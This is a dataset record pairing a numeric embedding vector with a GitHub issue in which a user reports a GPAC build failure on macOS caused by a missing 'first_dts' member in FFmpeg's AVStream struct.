-0.00006429477798519656, 0.006585300900042057, -0.011942962184548378, -0.02071831189095974, -0.017884131520986557, 0.023294838145375252, -0.017126329243183136, -0.00581992045044899, -0.010472825728356838, 0.008563164621591568, 0.014913546852767467, 0.009624087251722813, 0.011185159906744957, 0.02015753835439682, 0.011730777099728584, 0.009063313715159893, 0.004652905277907848, 0.0321914367377758, 0.017823506146669388, -0.013625282794237137, -0.004023929592221975, -0.010995709337294102, -0.007703058887273073, 0.006123041268438101, -0.0028133406303822994, 0.011063911952078342, 0.006005581934005022, -0.007934188470244408, 0.002517797751352191, -0.02003628946840763, 0.017793195322155952, 0.0061912438832223415, -0.018490372225642204, -0.012776544317603111, -0.017626479268074036, -0.015004483051598072, 0.01373895350843668, -0.01933911070227623, -0.026841353625059128, -0.006456474307924509, 0.008904175832867622, 0.004573335871100426, -0.017687102779746056, -0.0038193229120224714, -0.02528028003871441, 0.012405221350491047, -0.005979059264063835, -0.004436931572854519, 0.00998025480657816, 0.015822909772396088, -0.007903876714408398, 0.018429748713970184, -0.023749519139528275, -0.0033949536737054586, -0.013185757212340832, 0.008206997066736221, 0.02565918117761612, -0.008373714052140713, -0.029493659734725952, -0.006683815270662308, -0.002280984539538622, -0.030645519495010376, 0.008487383835017681, 0.0013630966423079371, 0.0031448788940906525, 0.01947551593184471, 0.013890514150261879, 0.015989625826478004, -0.01336005236953497, -0.04361909255385399, 0.009495261125266552, 0.02429513819515705, 0.0005944010918028653, -0.015133309178054333, 0.004607437178492546, -0.004925713874399662, 0.015807753428816795, -0.009108781814575195, 0.012738654389977455, -0.0037056526634842157, 0.006285969167947769, 0.016686804592609406, 0.004311894532293081, 0.011670153588056564, 0.005486487876623869, 0.013125133700668812, -0.01233701966702938, 0.004436931572854519, 0.0003909785591531545, -0.004474821966141462, 0.003626083256676793, -0.00929823238402605, 0.020748622715473175, 0.009320966899394989, -0.007339314091950655, 0.003207397647202015, -0.0030956219416111708, -0.009616509079933167, 0.018854117020964622, -0.0046415384858846664, 0.004550601821392775, 0.013663172721862793, 0.0034138988703489304, 0.012791700661182404, -0.004031507298350334, -0.023006873205304146, -0.015989625826478004, -0.0195967648178339, -0.008009969256818295, 0.00585402175784111, 0.01167773175984621, -0.0054751206189394, -0.0014076174702495337, 0.011003287509083748, 0.02091534063220024, 0.01261740643531084, 0.0026731472462415695, 0.008684412576258183, 0.008828395046293736, 0.019111771136522293, 0.0022734066005796194, 0.02171861007809639, 0.005100008565932512, 0.00042223790660500526, 0.00700967013835907, 0.00655498867854476, 0.005001494195312262, -0.020369721576571465, -0.006581511814147234, 0.009389168582856655, -0.002313191071152687, 0.003783327294513583, 0.005956325214356184, -0.008904175832867622, -0.004524079151451588, -0.006229133810847998, -0.007725792936980724, 0.00109881313983351, 0.005342505406588316, -0.0031657186336815357, 0.006369327194988728, -0.01035915594547987, 0.0068164304830133915, -0.004118654876947403, -0.02291593700647354, -0.026553388684988022, -0.00910120364278555, 0.008601054549217224, -0.0034385272301733494, 0.007888720370829105, -0.008517696522176266, 0.005846443586051464, -0.01815694011747837, -0.00007951002044137567, -0.017808351665735245, -0.0023207692429423332, 0.0008274252177216113, 0.0019570239819586277, 0.00425505917519331, -0.012624983675777912, 0.030766768380999565, 0.00630870321765542, 0.017474917694926262, -0.011245784349739552, 0.011124535463750362, 0.02465888299047947, 0.017308201640844345, -0.032585494220256805, 0.0013024724321439862, -0.007460562512278557, -0.010563761927187443, 0.02109721302986145, -0.016535243019461632, -0.013913247734308243, -0.0063844830729067326, -0.0027110371738672256, 0.0014672944089397788, -0.006232922896742821, -0.007218065671622753, 0.02828117646276951, 0.029311787337064743, -0.0032092921901494265, 0.0185964647680521, 0.0009079417213797569, -0.000023873728423495777, 0.006805063225328922, 0.007759894244372845, -0.027765871956944466, -0.0002496010856702924, -0.008548008278012276, 0.03522264584898949, 0.011912650428712368, 0.0042247469536960125, -0.022324852645397186, -0.015807753428816795, -0.009351278655230999, -0.015012061223387718, 0.010677432641386986, -0.015246979892253876, 0.014254258945584297, 0.002750821877270937, 0.006323859095573425, 0.011980852112174034, 0.01783866249024868, -0.020490970462560654, 0.0033722196239978075, -0.01376926526427269, -0.020612219348549843, 0.006145775783807039, -0.014383085072040558, 0.012306706979870796, -0.0041944351978600025, 0.022597661241889, 0.020869871601462364, 0.034131407737731934, 0.027129316702485085, -0.012920526787638664, -0.02083955891430378, -0.01223850529640913, -0.019263330847024918, -0.017868975177407265, 0.014011762104928493, 0.025325749069452286, 0.007384782191365957, 0.022324852645397186, -0.013958715833723545, 0.007134707178920507, -0.006596667692065239, -0.015489475801587105, 0.024689193814992905, 0.009866584092378616, -0.002817129483446479, 0.008494962006807327, 0.01852068491280079, 0.014239102602005005, 0.0018736658385023475, 0.0034233713522553444, 0.005039384588599205, 0.019748324528336525, -0.016944456845521927, -0.0009567252127453685, 0.011844447813928127, 0.005346294492483139, -0.005869177635759115, 0.004482399672269821, -0.012352175079286098, 0.002246883464977145, 0.008017546497285366, 0.009237607941031456, 0.0011859603691846132, 0.011852025985717773, -0.0029289054218679667, -0.005842654500156641, 0.015610724687576294, 0.012564360164105892, 0.014815032482147217, -0.003150562522932887, 0.011806557886302471, 0.02741728164255619, -0.0018736658385023475, -0.018808649852871895, -0.007449195254594088, -0.021112367510795593, 0.008449493907392025, 0.022385476157069206, 0.008767770603299141, -0.026144174858927727, 0.014163322746753693, 0.008252465166151524, 0.012965994887053967, 0.0010561867384240031, 0.0017097911331802607, 0.014004183933138847, -0.005497854668647051, 0.0046415384858846664, -0.010988131165504456, 0.014860500581562519, -0.012427955865859985, 0.017550697550177574, -0.01192022766917944, -0.009608931839466095, 0.002709142630919814, 0.008502540178596973, -0.0224006325006485, 0.0023302417248487473, 0.007843252271413803, -0.004615015350282192, -0.03267642855644226, -0.007987234741449356, 0.01467862818390131, -0.008396447636187077, 0.010336421430110931, 0.013526768423616886, 0.00445966562256217, 0.005308404099196196, -0.022597661241889, -0.010859305039048195, -0.009631665423512459, -0.015049951151013374, -0.013602549210190773, 0.005891911685466766, 0.00007151757745305076, -0.012352175079286098, 0.013610126450657845, 0.013087243773043156, 0.00807817094027996, -0.0074150944128632545, -0.008934487588703632, 0.02341608703136444, 0.008381292223930359, 0.012306706979870796, 0.03328267112374306, 0.0018026218749582767, -0.014466443099081516, -0.002243094379082322, 0.02015753835439682, -0.0250984076410532, -0.0051606325432658195, -0.025553088635206223, -0.004425564780831337, 0.010381889529526234, -0.010927507653832436, 0.008722302503883839, -0.006786118261516094, -0.007608333602547646, -0.005353872198611498, -0.005115164443850517, -0.02334030717611313, -0.0468018613755703, -0.0005048856837674975, -0.001103549380786717, 0.0037965888623148203, -0.011905072256922722, -0.014133010059595108, 0.004198223818093538, -0.024067796766757965, -0.015747129917144775, 0.005531955976039171, 0.004031507298350334, -0.016792895272374153, -0.03404047340154648, 0.016171498224139214, 0.004311894532293081, 0.02384045533835888, 0.022446099668741226, 0.02585620991885662, -0.016110874712467194, -0.0039026811718940735, -0.010048456490039825, 0.004130021668970585, 0.0023719207383692265, -0.016004782170057297, -0.01023790705949068, 0.0188995860517025, 0.023446399718523026, 0.00323960417881608, 0.009616509079933167, -0.016792895272374153, 0.01658071205019951, 0.012177880853414536, 0.017611322924494743, 0.0037549096159636974, 0.014436131343245506, -0.0035692481324076653, 0.01883896254003048, 0.0003881368029396981, -0.013632860966026783, 0.0017050548922270536, -0.02047581411898136, 0.013466144911944866, 0.015284869819879532, 0.007964501157402992, -0.011056333780288696, 0.02515903115272522, 0.012912948615849018, -0.00428916048258543, 0.010146970860660076, -0.006259446032345295, -0.00456954725086689, -0.021733766421675682, -0.005039384588599205, 0.011814136058092117, 0.000258363172179088, 0.01709601655602455, -0.034767962992191315, 0.005323560442775488, -0.004205801989883184, -0.007187753450125456, -0.03053942695260048, 0.0019153449684381485, 0.016611022874712944, -0.006263235118240118, -0.0037871163804084063, -0.023188745602965355, -0.010404624044895172, -0.019566452130675316, -0.004444509744644165, 0.01442855317145586, 0.02765977941453457, -0.006789907347410917, 0.004277793224900961, -0.009283076971769333, -0.0012276394991204143, -0.004391463473439217, -0.00904058013111353, -0.009427058510482311, -0.007790206465870142, 0.004251270089298487, 0.0224006325006485, -0.011063911952078342, -0.011874759569764137, -0.044225335121154785, 0.0014388768468052149, 0.019611919298768044, 0.005793397780507803, 0.01063954271376133, 0.00011722252384060994, -0.017929598689079285, 0.014064808376133442, 0.027447594329714775, -0.007180175743997097, -0.019581608474254608, 0.022264227271080017, -0.013314584270119667, -0.00309941079467535, 0.03143363445997238, -0.01897536590695381, -0.008161528967320919, 0.03437390550971031, 0.013685907237231731, -0.008244887925684452, -0.005581213161349297, -0.03807198256254196, -0.0037946943193674088, 0.008881441317498684, -0.00797965656965971, -0.013284271582961082, -0.004974971059709787, -0.006661081220954657, -0.02735665813088417, -0.01758101023733616, -0.013754108920693398, 0.016868676990270615, 0.0024192833807319403, 0.02803868055343628, -0.0008638944709673524, 0.025068094953894615, 0.005926012992858887, 0.02141548879444599, -0.012867480516433716, -0.008002391085028648, -0.023931391537189484, -0.02003628946840763, -0.00031472471891902387, 0.00047031097346916795, -0.006888421718031168, -0.011435234919190407, 0.022021731361746788, -0.00885870773345232, -0.009768069721758366, -0.003967094235122204, 0.013875357806682587, -0.002415494294837117, 0.004565758164972067, 0.017383981496095657, 0.0019418681040406227, -0.0016681120032444596, 0.004467243794351816, -0.002574632875621319, 0.011033599264919758, -0.013011462986469269, -0.0025822108145803213, -0.0010628175223246217, -0.010821415111422539, -0.030751612037420273, -0.02373436465859413, -0.007941766642034054, -0.00957861915230751, 0.018748026341199875, 0.0019286065362393856, -0.003351380117237568, 0.015595568343997002, -0.004304316360503435, 0.0079493448138237, 0.013579814694821835, 0.002118057105690241, -0.004937081132084131, 0.0289935115724802, 0.013443410396575928, -0.002038487931713462, -0.019702855497598648, -0.005656993016600609, 0.00449376692995429, -0.008434338495135307, 0.005895700771361589, -0.012761388905346394, 0.011874759569764137, -0.014731674455106258, -0.008040281012654305, 0.005232623778283596, 0.005630469880998135, 0.017429450526833534, 0.003690496552735567, -0.015444007702171803, 0.009078470058739185, -0.0019437625305727124, 0.02385561168193817, 0.0026693581603467464, -0.0040618195198476315, 0.02729603461921215, -0.01821756362915039, -0.0109502412378788, -0.006596667692065239, -0.000856790051329881, 0.014367928728461266, 0.0010362945031374693, -0.024325449019670486, 0.014572535641491413, -0.015300026163458824, 0.0111472699791193, 0.004902979824692011, 0.0021711031440645456, -0.015246979892253876, 0.005778241436928511, 0.01389809139072895, -0.001327101024799049, 0.003603349206969142, -0.015413695946335793, 0.007797784171998501, 0.035071082413196564, -0.015125731006264687, 0.0005697724991478026, 0.041588183492422104, -0.005759296473115683, 0.02491653524339199, 0.003703758120536804, 0.00763485673815012, 0.005096219480037689, 0.010866883210837841, 0.005251569207757711, -0.02277953363955021, -0.0004738631541840732, -0.015853220596909523, -0.016853520646691322, 0.011003287509083748, -0.010783525183796883, -0.0006616560276597738, 0.006380694452673197, -0.006634558085352182, -0.0009576724842190742, 0.010200017131865025, 0.004550601821392775, 0.016035092994570732, 0.019111771136522293, 0.0060775731690227985, 0.03692012280225754, -0.009874162264168262, 0.01583806611597538, 0.015231823548674583, 0.00777505012229085, 0.014966593123972416, -0.002731876913458109, 0.0012295340420678258, -0.003932993393391371, 0.006710338406264782, 0.005838865879923105, -0.008434338495135307, -0.008100905455648899, 0.0006280285306274891, -0.012488579377532005, -0.012556781992316246, -0.017429450526833534, 0.011548904702067375, -0.021567050367593765, 0.002387076849117875, 0.005922223906964064, -0.012723498046398163, 0.0051265317015349865, 0.026250267401337624, -0.04571062698960304, 0.0072862678207457066, -0.01971801184117794, -0.009328545071184635, 0.025492465123534203, 0.004959815181791782, -0.016004782170057297, -0.01908145844936371, 0.012693186290562153, -0.017490074038505554, 0.00020046235295012593, -0.005278091877698898, 0.009608931839466095, 0.0024268613196909428, -0.006649713963270187, -0.009942363947629929, -0.030584895983338356, -0.0021161625627428293, -0.008388870395720005, 0.013496456667780876, 0.02717478573322296, -0.03035755455493927, -0.00513032078742981, 0.01282959058880806, -0.0025026416406035423, 0.032949239015579224, 0.0038382678758352995, 0.005012861452996731, -0.008237309753894806, 0.010715322569012642, -0.03267642855644226, -0.003936782479286194, -0.004228536039590836, 0.0025386372581124306, -0.001382041722536087, -0.012988729402422905, -0.011882337741553783, -0.0023207692429423332, 0.017186952754855156, -0.012215770781040192, -0.000011574244126677513, 0.005342505406588316, 0.0024988525547087193, -0.018353968858718872, 0.016110874712467194, -0.005759296473115683, 0.015459164045751095, 0.00021052690863143653, 0.0069755688309669495, -0.020051445811986923, 0.01595931313931942, 0.00007228722097352147, -0.010253063403069973, 0.003997406456619501, -0.022052042186260223, -0.0077333711087703705, 0.008563164621591568, -0.009677133522927761, -0.020430346950888634, -0.00042744778329506516, 0.005376606248319149, -0.007623489946126938, 0.0075742327608168125, 0.024264825507998466, 0.007797784171998501, 0.0025822108145803213, -0.012359753251075745, -0.005217467900365591, 0.0017912548501044512, 0.023052342236042023, 0.0018035691464319825, 0.0005077274399809539, -0.000968092237599194, 0.000558405474293977, 0.006482997443526983, -0.009510417468845844, 0.006255656946450472, 0.010541028343141079, 0.010616808198392391, 0.012746232561767101, -0.01965738832950592, 0.004111076705157757, 0.003173296572640538, -0.035647012293338776, 0.0021010064519941807, -0.011556482873857021, 0.015027216635644436, 0.005857810843735933, 0.008979955688118935, -0.0022696175146847963, -0.0012058527208864689, -0.0062215556390583515, -0.029205694794654846, -0.0016832681139931083, 0.0037946943193674088, -0.00028038679738529027, 0.005891911685466766, -0.029690688475966454, 0.00205743289552629, 0.004141388926655054, 0.03843572735786438, -0.004281582310795784, -0.0043535735458135605, 0.01583806611597538, 0.013117555528879166, 0.013807155191898346, -0.023885924369096756, -0.005763085559010506, 0.007202909793704748, 0.008911753073334694, -0.0009396746754646301, -0.005278091877698898, -0.02103658765554428, -0.012912948615849018, -0.0020858505740761757, -0.004327050410211086, 0.015686504542827606, -0.012534047476947308, -0.02434060536324978, 0.009048158302903175, 0.004906768910586834, 0.0013725691242143512, 0.022734064608812332, 0.00010745397594291717, -0.03060005232691765, -0.004402830731123686, 0.0011253361590206623, -0.003105094423517585, 0.00904058013111353, -0.021794389933347702, -0.01627759076654911, -0.005065907258540392, 0.011594372801482677, 0.0023056131321936846, 0.0003476417332421988, -0.018884429708123207, -0.001065659336745739, -0.020127225667238235, -0.016035092994570732, -0.009086048230528831, -0.015390962362289429, 0.01213999092578888, 0.006536043714731932, 0.002476118505001068, -0.017050549387931824, -0.0020782724022865295, -0.0125492038205266, 0.022582504898309708, 0.006456474307924509, -0.00456954725086689, 0.0039216261357069016, -0.009343700483441353, 0.03185800462961197, -0.00235487031750381, 0.005804764572530985, -0.005865388549864292, 0.006092729512602091, 0.0037852218374609947, -0.004095920827239752, -0.0041944351978600025, 0.011753511615097523, 0.005058329552412033, 0.014746829867362976, -0.0035730372183024883, -0.00948010478168726, 0.007403727155178785, 0.014564957469701767, -0.020309098064899445, -0.013117555528879166, 0.00449376692995429, -0.00032514450140297413, 0.0056077358312904835, 0.010866883210837841, -0.0075552877970039845, -0.010715322569012642, 0.017793195322155952, 0.017126329243183136, -0.03692012280225754, 0.02346155419945717, 0.005603947211056948, -0.015292447991669178, 0.0193997360765934, 0.01551978848874569, 0.005513010546565056, 0.00453544594347477, 0.01915723830461502, -0.014474021270871162, -0.009684711694717407, 0.003963305149227381, 0.01226881705224514, -0.012988729402422905, -0.004698373377323151, -0.013966294005513191, 0.007684113923460245, -0.027947744354605675, 0.009358856827020645, 0.001219114288687706, -0.015080262906849384, -0.004596069920808077, -0.01808116026222706, 0.009313388727605343, 0.015489475801587105, 0.009116359986364841, 0.026947444304823875, -0.013701063580811024, 0.009495261125266552, 0.014246680773794651, -0.0027583998162299395, 0.017293045297265053, 0.014276992529630661, -0.007873564958572388, 0.009608931839466095, 0.009207296185195446, -0.0061912438832223415, -0.0035673535894602537, 0.000888996641151607, -0.009987832978367805, -0.006320070009678602, 0.024143576622009277, 0.008297933265566826, 0.019005678594112396, -0.011526171118021011, -0.019414890557527542, -0.012806857004761696, -0.006153353489935398, 0.020051445811986923, -0.009010267443954945, 0.011829291470348835, 0.002610628493130207, 0.007941766642034054, -0.0015534944832324982, -0.013504034839570522, 0.02471950650215149, 0.011852025985717773, -0.006115463562309742, 0.005531955976039171, -0.010093924589455128, -0.007305212784558535, 0.026022925972938538, -0.004300527274608612, 0.010533450171351433, 0.01364043913781643, -0.006539832800626755, 0.014322460629045963, -0.027841651812195778, -0.01107906736433506, 0.015072684735059738, -0.023507023230195045, -0.004141388926655054, -0.006661081220954657, -0.01803569123148918, 0.015974469482898712, 0.016808051615953445, -0.006733072455972433, 0.009161828085780144, -0.0018168307142332196, -0.001824408769607544, 0.006437529344111681, 0.00041300218435935676, -0.009002689272165298, 0.01897536590695381, -0.0033949536737054586, -0.023446399718523026, -0.003002790967002511, 0.0043687294237315655, -0.0003625609679147601, -0.004023929592221975, -0.00948010478168726, 0.022673441097140312, 0.0025159032084047794, 0.012761388905346394, -0.015989625826478004, -0.008669257164001465, -0.02053643949329853, 0.006710338406264782, 0.005562267731875181, 0.004323261324316263, 0.005645626224577427, -0.001083657145500183, -0.008222153410315514, 0.009495261125266552, 0.005315982270985842, 0.0005048856837674975, -0.016035092994570732, -0.028326645493507385, 0.0069604129530489445, 0.02591683343052864, -0.019354267045855522, 0.0017628372879698873, 0.0027375603094697, -0.02753853052854538, 0.0010864988435059786, -0.013375207781791687, 0.016368526965379715, -0.006805063225328922, -0.006748228333890438, -0.0014644527109339833, -0.013231226243078709, -0.002479907590895891, 0.0016586395213380456, -0.021491268649697304, 0.017626479268074036, -0.025825897231698036, 0.008108483627438545, -0.019430046901106834, 0.0008492120541632175, 0.002485590986907482, -0.009245186112821102, 0.002504536183550954, 0.016201810911297798, -0.010124237276613712, -0.00766895804554224, -0.007631067652255297, -0.008017546497285366, 0.02584105357527733, -0.022506725043058395, 0.0013176285428926349, 0.0012115362333133817, -0.0011528065660968423, -0.012534047476947308, -0.0014625581679865718, 0.02146095782518387, 0.0020877448841929436, -0.0009553043637424707, -0.0015885428292676806, -0.028690390288829803, 0.004906768910586834, 0.023507023230195045, 0.025992615148425102, 0.017565853893756866, 0.0137995770201087, 0.011238206177949905, -0.0077333711087703705, -0.01977863721549511, 0.010783525183796883, 0.009320966899394989, 0.014534645713865757, 0.005672149360179901, -0.031130513176321983, 0.012882636860013008, 0.0031770856585353613, 0.012534047476947308, 0.014890812337398529, -0.00998025480657816, -0.020354565232992172, -0.005766874644905329, -0.01107906736433506, -0.007161230314522982, -0.0008998900884762406, 0.014314882457256317, -0.012776544317603111, 0.015822909772396088, 0.008335824124515057, 0.011389766819775105, -0.005058329552412033, 0.0158986896276474, -0.0016179076628759503, 0.011283674277365208, -0.005660782102495432, 0.01871771365404129, -0.0018774548079818487, 0.013716218993067741, 0.0032471823506057262, -0.001061870250850916, 0.002146474551409483, -0.004236114211380482, -0.02009691298007965, -0.003156245918944478, 0.01310997735708952, -0.006949045695364475, 0.025507621467113495, -0.017232421785593033, 0.023628272116184235, 0.011170003563165665, 0.010222751647233963, -0.013428254052996635, -0.01433003880083561, -0.01229912880808115, 0.0188995860517025, 0.001508026267401874, -0.02497715875506401, 0.014072386547923088, -0.011276096105575562, -0.0013242593267932534, 0.0028550196439027786, -0.0009785119909793139, 0.004770364612340927, -0.002252566860988736, 0.003178979968652129, -0.019490672275424004, -0.008063014596700668, 0.0024818021338433027, 0.021673141047358513, 0.012564360164105892, 0.015807753428816795, -0.003201714251190424, 0.004872668068856001, -0.02609870582818985, 0.0022923515643924475, 0.007206698413938284, 0.022249070927500725, 0.002927010878920555, -0.003086149226874113, -0.019490672275424004, 0.014216369017958641, -0.004342206288129091, -0.0036185053177177906, -0.016232121735811234, -0.00898753385990858, 0.013322162441909313, 0.0029497449286282063, -0.011829291470348835, 0.0017742043128237128, -0.0029023822862654924, -0.013473722152411938, 0.002978162607178092, 0.016353370621800423, -0.004118654876947403, 0.02290078066289425, 0.007502241525799036, 0.01163984090089798, -0.010904773138463497, 0.010495560243725777, 0.009677133522927761, -0.01621696725487709, 0.026629168540239334, -0.006698971148580313, 0.0012882637092843652, 0.00017832031880971044, -0.00068865274079144, 0.016065405681729317, 0.013549502938985825, -0.015012061223387718, 0.006520887836813927, -0.009639243595302105, 0.0009690395090728998, -0.005778241436928511, -0.004687006585299969, -0.0193997360765934, -0.025325749069452286, 0.017550697550177574, -0.005850232671946287, -0.0021388966124504805, 0.01173835527151823, 0.005266725085675716, -0.012147569097578526, -0.01373895350843668, -0.010366733185946941, -0.009495261125266552, 0.017368825152516365, -0.005342505406588316, 0.011897494085133076, 0.01795991137623787, 0.025174187496304512, 0.01111695822328329, 0.005948747042566538, 0.00749466335400939, 0.0074454061686992645, -0.007911454886198044, -0.010927507653832436, -0.02467403933405876, 0.00032680219737812877, 0.0066724480129778385, 0.011768667958676815, -0.0021995208226144314, 0.006016949191689491, 0.0026030505541712046, 0.006608034949749708, -0.007449195254594088, 0.01614118553698063, 0.017353668808937073, 0.008957221172749996, -0.004861300811171532, -0.006740650162100792, 0.009533151052892208, 0.001219114288687706, -0.011185159906744957, -0.015315181575715542, 0.0037776438985019922, 0.01989988423883915, -0.016171498224139214, 0.03431328386068344, 0.015042372979223728, -0.002824707655236125, 0.0030236307065933943, 0.001335626351647079, -0.00008158214041031897, -0.006304914131760597, -0.002629573456943035, 0.003252865746617317, 0.006388272158801556, 0.015300026163458824, -0.0015724394470453262, -0.024764975532889366, 0.006937678903341293, 0.012041476555168629, -0.000563141715247184, 0.011442813090980053, 0.03060005232691765, -0.031130513176321983, -0.006107885390520096, -0.00571382837370038, 0.02767493575811386, -0.014466443099081516, -0.016171498224139214, -0.000050796425057342276, -0.019414890557527542, 0.014360351487994194, 0.05825982987880707, -0.011245784349739552, 0.0015013954835012555, -0.013125133700668812, -0.004505133721977472, -0.01797506771981716, -0.02484075538814068, 0.022703753784298897, -0.006441318430006504, 0.017232421785593033, 0.0039026811718940735, -0.013466144911944866, -0.003383586648851633, 0.0063844830729067326, -0.015565256588160992, 0.004543024115264416, 0.008017546497285366, 0.0073014236986637115, -0.0048044659197330475, -0.003626083256676793, 0.0038363735657185316, -0.008873863145709038, 0.011806557886302471, 0.00044899777276441455, 0.008396447636187077, 0.005831287708133459, 0.0017988329054787755, 0.0014218263095244765, -0.02453763410449028, 0.0015298131620511413, 0.007339314091950655, 0.03016052581369877, -0.027553686872124672, -0.00578960869461298, -0.016186654567718506, -0.002453384455293417, -0.008555586449801922, 0.0006337120430544019, -0.006418584380298853, 0.029069291427731514, -0.015421274118125439, -0.0013100504875183105, -0.00034266867442056537, -0.0095483073964715, -0.005372817162424326, 0.0024742239620536566, 0.00898753385990858, -0.0017429449362680316, 0.03892071917653084, 0.0020517492666840553, -0.0017344197258353233, 0.00851011835038662, -0.004777942784130573, 0.0033665362279862165, -0.010298531502485275, 0.010169705376029015, 0.0009316230425611138, 0.0038382678758352995, 0.021309396252036095, -0.01386777963489294, 0.004452087916433811, 0.015095419250428677, 0.002514008665457368, 0.018475215882062912, 0.001140492269769311, -0.022643128409981728, -0.015163620933890343, 0.013663172721862793, -0.00599421514198184, -0.004402830731123686, 0.0066383471712470055, -0.007399938069283962, -0.004198223818093538, 0.0033589580561965704, 0.0005456175422295928, -0.00826004333794117, -0.004668061155825853, -0.005986636970192194, 0.012124834582209587, 0.005876755807548761, 0.010882039554417133, -0.005800975486636162, 0.010791102424263954, 0.013307006098330021, 0.014337616972625256, -0.00137730548158288, -0.015807753428816795, -0.014360351487994194, 0.0005981900612823665, 0.015444007702171803, -0.01139734499156475, -0.02453763410449028, -0.03029693104326725, -0.008654100820422173, 0.0027583998162299395, -0.004539235029369593, -0.011594372801482677, 0.011063911952078342, 0.017747726291418076, -0.01927848719060421, 0.006024527363479137, -0.0008724197396077216, 0.00700967013835907, 0.0054751206189394, -0.010283375158905983, 0.02191563881933689, -0.013216069899499416, -0.006702760234475136, 0.030372710898518562, -0.028311489149928093, -0.019187550991773605, -0.010503138415515423, -0.007111973129212856, -0.013693485409021378, -0.012208192609250546, -0.011541326530277729, 0.0005612472305074334, -0.05237928405404091, 0.000786693359259516, -0.004986338317394257, 0.010935084894299507, 0.00782809592783451, 0.02597745880484581, 0.002830391051247716, 0.0036791295278817415, -0.0043573626317083836, -0.012685608118772507, 0.00045302361832000315, -0.010404624044895172, -0.0160957183688879, -0.005922223906964064, 0.0032926504500210285, 0.014269414357841015, -0.0008307406096719205, 0.05413738638162613, 0.006464052479714155, -0.001215325202792883, 0.006066206376999617, 0.00550922192633152, 0.011215471662580967, 0.011942962184548378, -0.015451585873961449, -0.012875058688223362, 0.014754408039152622, 0.012473423965275288, -0.008161528967320919, 0.0257955864071846, -0.0051265317015349865, 0.006357959937304258, -0.006005581934005022, -0.01292810495942831, 0.006149564404040575, -0.012465845793485641, -0.012609828263521194, 0.0026883031241595745, 0.006725494284182787, 0.022885626181960106, 0.004808254539966583, 0.0017903075786307454, 0.005566056817770004, 0.012973573058843613, 0.0072824787348508835, 0.00782051868736744, -0.03155488148331642, 0.014072386547923088, -0.012511313892900944, 0.010275796987116337, 0.008676834404468536, 0.005164421629160643, 0.01501963846385479, 0.010169705376029015, 0.016944456845521927, -0.009692289866507053, -0.009957520291209221, 0.016323057934641838, -0.002466646023094654, -0.014087541960179806, -0.005016650538891554, 0.010821415111422539, -0.017111172899603844, -0.0026958812959492207, 0.004156544804573059, 0.007180175743997097, -0.00015309972513932735, 0.004156544804573059, 0.013299427926540375, 0.013655595481395721, 0.0005555637180805206, -0.002063116291537881, -0.017126329243183136, -0.005039384588599205, -0.002351081231608987, -0.005634258966892958, -0.011556482873857021, -0.006376905366778374, -0.01576228439807892, -0.007934188470244408, -0.0018689295975491405, -0.0069604129530489445, 0.005206101108342409, 0.022021731361746788, 0.018884429708123207, -0.040466636419296265, -0.0011187054915353656, 0.0015440218849107623, 0.0011433339677751064, -0.0046756393276154995, -0.012632561847567558, -0.026371514424681664, -0.019702855497598648, 0.021809546276926994, -0.01615634188055992, -0.007403727155178785, 0.00907089188694954, -0.0160957183688879, -0.005387973506003618, -0.019581608474254608, -0.0037227030843496323, 0.002690197667106986, -0.01608056202530861, -0.03097895160317421, -0.01633821427822113, -0.01098055299371481, 0.031221449375152588, 0.023628272116184235, 0.026113862171769142, -0.01533791609108448, -0.004940870217978954, 0.0013394153211265802, -0.023688895627856255, 0.0045127118937671185, 0.013935982249677181, -0.006213977932929993, 0.014633160084486008, -0.0024117054417729378, 0.026022925972938538, -0.007183964364230633, 0.0019380790181457996, -0.003955727443099022, -0.013670750893652439, -0.017111172899603844, -0.018126627430319786, -0.0007170703029260039, 0.009086048230528831, 0.013996605761349201, 0.009790804237127304, -0.022127823904156685, -0.00028607030981220305, 0.01752038672566414, 0.012041476555168629, -0.00038576865335926414, 0.007437828462570906, 0.006361749023199081, 0.005058329552412033, -0.0037227030843496323, -0.0222945399582386, 0.0317973792552948, 0.005134109873324633, 0.00835855770856142, 0.0013953032903373241, 0.026492763310670853, 0.018111471086740494, 0.01714148558676243, 0.002978162607178092, -0.006615613121539354, -0.004410408437252045, 0.0011603846214711666, 0.0069642020389437675, -0.007956922985613346, 0.004891613032668829, -0.0008534747175872326, 0.013019041158258915, 0.025644024834036827, 0.0005299879121594131, -0.00882081687450409, 0.05247022211551666, 0.00031401426531374454, 0.0011054439237341285, 0.0018594571156427264, 0.005198522936552763, -0.008313089609146118, -0.01433003880083561, -0.009055735543370247, -0.019233018159866333, 0.022006575018167496, 0.004433142486959696, 0.021506424993276596, -0.004925713874399662, 0.005513010546565056, -0.0008506329031661153, 0.017505230382084846, 0.006604245863854885, -0.019611919298768044, 0.0035787206143140793, 0.01170804351568222, 0.0061988215893507, -0.00982869416475296, 0.0008747878600843251, 0.00797965656965971, 0.00042886866140179336, -0.007240799721330404, -0.010404624044895172, 0.02385561168193817, -0.0016453779535368085, -0.0244012288749218, 0.017868975177407265, -0.014367928728461266, -0.007180175743997097, 0.015807753428816795, 0.012230927124619484, -0.00735446996986866, -0.0005148318596184254, 0.020642530173063278, 0.020566750317811966, 0.008449493907392025, -0.0009766175644472241, -0.03616232052445412, 0.01914208196103573, 0.022491568699479103, -0.0006408164626918733, -0.01703539304435253, -0.03091832809150219, 0.006445107515901327, -0.006740650162100792, 0.01026064157485962, -0.0030937273986637592, 0.0255985576659441, -0.016201810911297798, -0.017747726291418076, 0.0219004824757576, 0.023082653060555458, -0.01523940172046423, -0.014852922409772873, -0.010343999601900578, 0.01163984090089798, -0.016565555706620216, -0.0195967648178339, 0.013284271582961082 ]
1,743
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
I am building GPAC on OSX. When running `make` in directory gpac_public: ``` cd ../gpac_public ./configure --extra-cflags=-Wno-deprecated make sudo make install ``` I encounter an error called "filters/ff_dmx.c:249:16: error: no member named 'first_dts' in 'struct AVStream'" I have already looked for `ff_dmx.c` and `libavformat/avformat.h` where "struct AVStream" is defined. I even include `libavformat/avformat.h` into `ff_dmx.c`. However, it does not solve the problem. Can anyone encounter this error? How to fix it?
GPAC Build error: no member named 'first_dts' in 'struct AVStream'
https://api.github.com/repos/gpac/gpac/issues/1866/comments
4
2021-07-29T14:23:48
2021-07-30T12:40:01Z
https://github.com/gpac/gpac/issues/1866
955,897,982
1,866
false
